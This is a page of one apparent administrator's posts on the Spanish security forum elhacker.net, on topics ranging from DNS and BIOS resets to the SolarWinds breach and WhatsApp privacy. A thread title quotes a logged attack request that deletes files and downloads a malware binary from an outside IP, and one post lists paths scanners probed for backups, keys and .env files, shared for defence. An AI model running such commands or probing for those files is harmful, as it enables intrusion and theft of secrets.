elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 ... 486
141  Foros Generales / Foro Libre / Re: El PP y el Franquismo, la computacion endogamica para el Tribunal de Cuentas en: 11 Enero 2021, 13:38 pm
Foro Libre ≠ Foro Política
142  Comunicaciones / Redes / Re: DNS usos y tipos en: 11 Enero 2021, 13:37 pm
Creo que no has enteniddo mucho. Las páginas https no las puede ver, pero si la petición DNS al dominio que visitas (es decir la web que visitas)
143  Seguridad Informática / Nivel Web / Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86 en: 11 Enero 2021, 13:32 pm
Muy divertido también ver todas las peticiones no encontradas.

La mayoría en busca de scripts de wordpress y copias de seguridad:

Errores 404

Código:
/config.bak.php
/admin.php
/admin/index.php
/phpMyAdmin/
/app/etc/local.xml
/phpmyadmin/
/shell.php
/wp-content/uploads/
/admin/logs/errors.log
/backup.sql
/database.sql
/db.sql
/m.php
/localhost.sql
/mysql.sql
/.ksh_history
/.zsh_history
/dbdump.sql
/.env.development.local
elhacker.net.sq
/backup.sql.gz
/server.key
/key.pem
/www.key
/elhacker.net.sql.gz
/mysqldump.sql
/wp-content/uploads/upload_index.php
/wp-content/backup-db/
/www.elhacker.net.sql.gz
/phpinfo.php
/elhacker.net.tar.gz
/my.key 2 -
/site.sql 2 -
/elmah.axd 2 -
/www.tar.gz
/backup.rar
/www.elhacker.net.tar.gz
/privatekey.key
/db_backup.sql
/.env.prod.local 2 -
/.env.production.local 2 -
/temp.sql 2 -
/www.elhacker.net.gz 2 -
/translate.sql 2 -
/api/api-browser/ 2 -
/wp-content/uploads/dump.sql 2 -
/www.elhacker.net.7z
/back/bak.zip
/_DB_.tar.gz
/old/bak.tar.gz
/backup-localhost.sql.gz
/www.elhacker.net.db
/backup/bak.tar.gz
/bak/www.sql 1 -
/restore/directory.tar.gz 1 -
/bak/directory.zip 1 -
/restore/elhacker.net.gz 1 -
/wp-content/plugins/three-column-screen-layout/db.php 1 -
/elhacker.tar.gz
/localhost-dump.sql.gz 1 -
/inc/database.php.bck 1 -
/elhackerdb.sql 1 -
/elhacker.net.xz 1 -
/_DB_.sql.zip
/dump.rar 1 -
/back/backup.gz
/www.elhacker.net.pem 1 -
/old/website.rar 1 -
/elhacker.net.sql.tar.gz 1 -
/wordpress/wp-config.php~ 1 -
/webadmin.php 1 -
/backup/backup.tar.gz 1 -
/old/www.tar.gz
/backups/elhacker.net.gz 1 -
/wp-content/plugins/wp-1ogin_bak.php 1 -
/elhacker.net.sql.tar.z
/restore/backup.tar.gz 1 -
/backup.tgz 1 -
/restore/.well-known.zip 1 -
/js/mage/adminhtml/sales.js 1 -
/elhacker.bck.sql
/www.elhacker.net.tar 1 -
/old/backup.gz 1 -
/elhacker.gz
/inc/config.php.bck 1 -
/backup/elhacker.net.zip 1 -
/backup/www.zip 1 -
/localhost_database.sql.gz
elhacker.net.bak.sql 1 -
/back/backup.tar.gz 1 -
/restore/directory.gz 1 -
/backupelhacker.net.sql 1 -
/localhost-db.sql.gz 1 -
/backups/www.gz 1 -
/elhacker_backup.gz
/backup.ibz 1 -
/www.elhacker.tar 1 -
/bak.rar 1 -
/db_backup.elhacker.sql.gz 1 -
/localhostbackup.sql.gz
//backup/wp-admin/install.php 1 -
/administrator/index.php 1 -
/backups/backup.tar.gz 1 -
/restore/website.tar.gz
/back/credentials.txt 1 -
/backupelhacker.net.sql.gz 1 -
/back/www.gz 1 -
/bak/sql.sql
/bak/website.tar.gz 1 -
/bak/www.gz
/site.tgz 1 -
/backups/elhacker.net.tar.gz 1 -
/localhost_db.sql.gz 1 -
/public_html.tar
/elhacker.net.z 1 -
/localhost_dump.sql 1 -
/conf/database.bck 1 -
/site.rar 1 -
/elhacker.net.sql.zip
/backups/www.rar
/htodcs.rar 1 -
/elhacker.sql 1 -
/elhacker.net_database.sql
/backup/backup.bz2 1 -
/elhacker_backup.tgz 1 -
/restore/elhacker.net.rar
/web.rar 1 -
/home.tar 1 -
/back/elhacker.net.zip
/elhacker.net.bck 1 -
/bak/elhacker.net.sql
www.elhacker.net.sql.bz2 1 -
/backup.backup
/db.php.bck 1 -
/elhacker.net-backup.sql.gz 1 -
/elhacker.bck
/back/sql.sql 1 -
/conf/config.php.bck
elhacker.net_dump.sql 1 -
/elhacker_db.sql 1 -
/elhacker.net_db.sql 1 -
/backups/bak.zip 1 -
/conf.gz
[..]
144  Foros Generales / Foro Libre / Re: [MOD] Directo desde el Capitolio en: 11 Enero 2021, 13:18 pm
Opino lo mismo que MCKSys Argentina, es mejor tomárselo con humor:

Call of Duty: Capitol Warfare



Elige tu personaje:



145  Informática / Hardware / Re: BIOS en: 11 Enero 2021, 13:01 pm
Es una placa base bastante nueva.

Siempre puedes poner los valores por defecto (default) de la BIOS. Yo no tocaría nada de legacy, ni el secure boot.

¿De dónde has bajado el instalador de Windows 10?

Siempre puedes restaurar la BIOS:

https://www.asus.com/support/FAQ/1030210/

O lo mejor, hacer un "clear" de la bios, moviendo el  CLRTC jumper

Si la BIOS estuviera corrupta si que tendrías un problema, ni arrancaría, ni podrías entrar a ella.
146  Seguridad Informática / Nivel Web / Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86 en: 9 Enero 2021, 00:06 am
Quizás sea una buena idea reportar automáticamente las ip's a alguna servicio de terceros. He visto que hay varios servicios (un montón), cuando buscas por Google por una IP maliciosa ya aparecen los reportes y demás.

Los intentos fallidos de fail2ban por ssh son alarmantes xD



Citar
Otras veces pasaba que en el foro aparecían como bots de Google, usaban el user-agent de los bots spiders y recorrían el foro, esto lo hacían para ver si podían ver algo que los visitantes o usuarios no podían ver y realmente veían lo mismo, pero lo hacían para eso o para ver si podían tener algún acceso a algún lado.

Hay una regla en CloudFlare para bloquear los bots falsos, ip's que no pertenecen al rango de bots de Google y la tenemos activada

Acabaré haciendo el log del mod_security público y en tiempo real. Ví que habia un panel de control para mod_security pero sólo para Plesk.

El WAF de CloudFLare no para de trabajar, pero ni en versión de pago se pueden bajar o descargar los logs de registro, lo cuál es una pena.
147  Foros Generales / Foro Libre / Re: hackeo a nivel planetario en: 9 Enero 2021, 00:04 am
es uno de los hackeos más graves y sonados de toda la historia, pero básicamente afectó empresas de Estados Unidos y sus autores fueron Rusos.

Todo empezó con la empresa de seguridad americana FireEye, pero  finalmente ha sido mucho más grave. Usando software Orion de SolarWinds se extiende a MUCHAS otras empresas y es más grave de lo que incluso ya parecía. Todavía no se conoce el impacto real ni el número de afectados. No se sabe qué información se ha robado y para qué se puede haber utilizado.

El ciberataque a SolarWinds ha resultado ser uno de los más importantes y sofisticados de los últimos años. Según varias fuentes, los atacantes (nombre neutral UNC2452, pero varias fuentes de la comunidad sí atribuyeron la autoría a APT29 (Cozy Bear) estaría respaldado por Rusia, que habría estado desde marzo accediendo y vigilando el tráfico interno de correos electrónicos de, entre otras agencias estadounidenses, los departamentos de Justicia y Tesoro del país. Según Reuters, además, varias fuentes cercanas a la investigación temen que esto pueda ser tan solo la punta del iceberg. De hecho, el hackeo es tan grave que el pasado sábado se convocó en la Casa Blanca una reunión del Consejo de seguridad nacional al respecto. El malware ha sido bautizado por FireEye como Sunburst en su informe, y por Microsoft como Solorigate.

Rusia estaría detrás del ataque (Orion de SolarWinds) de espionaje masivo a agencias gubernamentales de Estados Unidos
https://blog.elhacker.net/2020/12/rusia-estaria-detras-del-ataque-espionaje-masivo-agencias-gubernamentales-estados-unidos.html
148  Foros Generales / Foro Libre / Re: [MOD] Directo desde el Capitolio en: 8 Enero 2021, 21:59 pm
El asaltante que se llevó un atril del Capitolio lo intentar subastar en eBay por más de 12.000 euros



El asalto armado y por la fuerza al Capitolio de múltiples partidarios de Donald Trump para detener el nombramiento oficial de Joe Biden dejó imágenes para la historia. No solo por lo crudo y terrible que fue este suceso que acabó con 52 detenidos y cuatro muertos, también por el sinfín de 'Trumpistas' que entraron con aspectos extraños y, lamentablemente, símbolos y proclamas radicales.

Con permiso del chamán vestido de búfalo sin camiseta que acaparó casi todas las fotos, otra de las imágenes del día fue un asaltante marchándose orgulloso con un atril del Capitolio que acababa de robar.



Pues, curiosamente, ya se sabe para qué lo quería: para subastarlo en eBay. A las pocas horas, el atrio estaba publicado en la página y, cuando recibió 29 pujas, alcanzó el precio de 14.980 dólares (unos 12.200 euros).
Subasta en eBay del atril robado por un asaltante al Capitolio.Subasta en eBay del atril robado por un asaltante al Capitolio.EBAY



Así lo compartió un usuario de Reddit, pues lo cierto es que eBay retiró rápidamente el anuncio cuando llevaba 111 pujas e impidió que esta venta se llevara a cabo.

https://www.reddit.com/r/interestingasfuck/comments/ks89a5/thug_stole_the_house_of_representatives_speaker/

Lo que sí se está vendiendo, aprovechando el histórico momento y la confusión de los compradores, son fotos del atril, producto que, aunque está especificado que es solo una imagen, provocará que muchos compradores se piensen que es el objeto robado y se quieran hacer con él.
149  Seguridad Informática / Hacking Ético / Re: Uso y automatización de cupp.py en: 8 Enero 2021, 20:38 pm
Por eso es siempre importante añadir una segunda cuenta de recuperación en tu cuenta de e-mail.

Si la cuenta de Google estaba asociada a un número de teléfono, pues es muy fácil recuperar la cuenta, basta con pedir un duplicado de tu número y la cuenta de Google (Gmail) volverá a ser tuya.

Intentar recuperar por fuerza bruta (probando contraseñas) una cuenta de Google es una santa tontería, aunque consigas saltar el captcha, acabarás baneado seguro. Tienen sistemas anti-fuerza bruta

puedes bloquear el teléfono remotamente, aunque esté apagado. Localizarlo es  tontería. Como bien dices, estará apagado y no volverán a encender.


    - Activar la opción de "Encontrar mi Dispositivo"

Ajustes de Google > Seguridad o Ajustes > Google > Seguridad.  "Encontrar mi dispositivo" tendremos que tener activadas las dos opciones, la de Localizar y la de permitir el borrado y bloqueo remoto. Una vez activadas estas dos opciones en "Ajustes > Seguridad > Administradores de dispositivos"

https://www.google.com/android/find?u=0


El Administrador de dispositivos Android, conocido también como Android Device Manager, es una página a través de la cual puedes localizar tus dispositivos Android en el mapa, ya sean teléfonos o tabletas. Una vez localizados, puedes:

Opciones de Google  - Encontrar mi Dispositivo

    Reproducir Sonido:  Solicitar que el dispositivo emita un sonido (incluso si está en modo silencio). El dispositivo sonará durante 5 minutos
    Bloquear dispositivo: bloquea el dispositivo y cierra sesión en tu cuenta Google. También puedes mostrar un mensaje o número de teléfono en la pantalla de bloqueo. Aún puedes localizar el teléfono.
    Borrar remotamente todos los datos del teléfono: borrar todo el contenido del dispositivo,
Después, no podrás localizarlo.


Qué hacer si te roban o pierdes el teléfono móvil
https://blog.elhacker.net/2014/03/que-hacer-si-te-roban-o-pierdes-el-telefono-movil-localizar.html
150  Foros Generales / Noticias / Re: WhatsApp borrará nuestra cuenta si no aceptamos que comparta nuestros datos con Facebook en: 7 Enero 2021, 20:16 pm
algunos se irán a Telegram, otros a Signal y la mayoría se quedarán en WhatsApp xD

Elon Musk dice

Citar
Use Signal

https://twitter.com/elonmusk/status/1347165127036977153


Citar
Verification codes are currently delayed across several providers because so many new people are trying to join Signal right now (we can barely register our excitement). We are working with carriers to resolve this as quickly as possible. Hang in there.

https://twitter.com/signalapp/status/1347240006444675072
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 ... 486
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines